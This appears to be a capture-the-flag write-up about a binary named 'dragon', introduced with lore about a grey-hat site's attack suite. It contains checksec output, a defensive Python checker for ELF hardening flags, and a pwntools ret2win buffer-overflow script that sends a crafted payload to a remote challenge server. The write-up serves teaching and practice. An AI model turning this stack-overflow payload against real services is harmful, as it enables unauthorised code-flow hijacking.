Pwnhack.com — Dragon

The term "Dragon" within the context of Pwnhack.com first appeared in underground coding repositories around 2018. Pwnhack.com, a now-semi-defunct domain, originally served as a hub for security researchers and "grey hat" hackers. The site hosted a variety of scripts, tutorials, and executable files aimed at bypassing standard security protocols in desktop applications and online games.

The "Dragon" moniker was not arbitrary. In cybersecurity, dragons symbolize a formidable, multi-layered defense—or in this case, a multi-vector offense. The Pwnhack.com Dragon suite was reportedly designed to "breathe fire" (execute payloads) across three key attack surfaces: memory injection, network packet manipulation, and local privilege escalation.

We downloaded the provided binary, dragon, and threw it into the standard analysis pipeline.

$ file dragon
dragon: ELF 64-bit LSB executable, x86-64, dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=a1b2c3d4..., for GNU/Linux 3.2.0, not stripped
$ checksec --file=dragon
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found  <-- Interesting...
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The lack of a Stack Canary and PIE (Position Independent Executable) suggested that this was likely a straightforward buffer overflow or ROP (Return Oriented Programming) challenge.
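How the four checksec fields above can be derived from the ELF headers themselves, useful when auditing build output for missing hardening. This is an added example, not code from the original write-up: `elf_mitigations` and `build_sample` are hypothetical names, the images are constructed test data, and the canary check is a string heuristic rather than a symbol-table lookup.

```python
import struct

# Constants from the ELF specification and its GNU extensions.
ET_DYN, PT_DYNAMIC, PF_X = 3, 2, 1
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
DT_BIND_NOW, DT_FLAGS, DF_BIND_NOW = 24, 30, 0x8

def elf_mitigations(data: bytes) -> dict:
    """Derive checksec-style fields from a 64-bit little-endian ELF image."""
    if data[:6] != b"\x7fELF\x02\x01":
        raise ValueError("expected ELF64, little-endian")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx, relro, bind_now = False, False, False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags, p_offset = struct.unpack_from("<IIQ", data, off)
        p_filesz = struct.unpack_from("<Q", data, off + 32)[0]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)        # stack segment mapped without execute
        elif p_type == PT_GNU_RELRO:
            relro = True                     # GOT region made read-only after relocation
        elif p_type == PT_DYNAMIC:           # Full RELRO also needs eager binding
            for d in range(p_offset, p_offset + p_filesz, 16):
                tag, val = struct.unpack_from("<QQ", data, d)
                if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW):
                    bind_now = True
    return {
        "PIE": e_type == ET_DYN,             # simplification: shared objects are ET_DYN too
        "NX": nx,
        "RELRO": "Full" if relro and bind_now else "Partial" if relro else "None",
        # Heuristic: canary-protected code imports __stack_chk_fail by name.
        "Canary": b"__stack_chk_fail" in data,
    }

def build_sample(e_type: int, phdrs: list, tail: bytes = b"") -> bytes:
    """Constructed test image: ELF64 header + program headers + raw tail."""
    ehdr = b"\x7fELF\x02\x01\x01" + bytes(9)
    ehdr += struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0, 64, 0, 0, 64, 56,
                        len(phdrs), 0, 0, 0)
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, o, 0, 0, sz, sz, 8)
                    for t, f, o, sz in phdrs)
    return ehdr + body + tail

if __name__ == "__main__":
    # Constructed image with the same profile checksec reported for dragon.
    image = build_sample(2, [(PT_GNU_STACK, 6, 0, 0), (PT_GNU_RELRO, 4, 0, 0)])
    print(elf_mitigations(image))
```

Running the same function over release artifacts in CI flags any binary that ships with `PIE` or `Canary` false before it reaches users.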

We need to craft a payload that looks like this: [64 bytes of junk] + [8 bytes of junk (RBP)] + [Address of print_flag]

We can write a quick Python script using pwntools:

from pwn import *
# Set up the context
context.arch = 'amd64'
elf = ELF('./dragon')
# Target address
target_addr = 0x401176
# Build the payload
# 64 bytes buffer + 8 bytes saved RBP = 72 bytes offset
payload = b'A' * 72
payload += p64(target_addr)
# Connect to the remote server
p = remote('pwnhack.com', 9001)
# Wait for the prompt
p.recvuntil(b'What do you do?')
p.recvline()
# Send the dragon-slaying payload
p.sendline(payload)
# Get the flag
print(p.recvall().decode())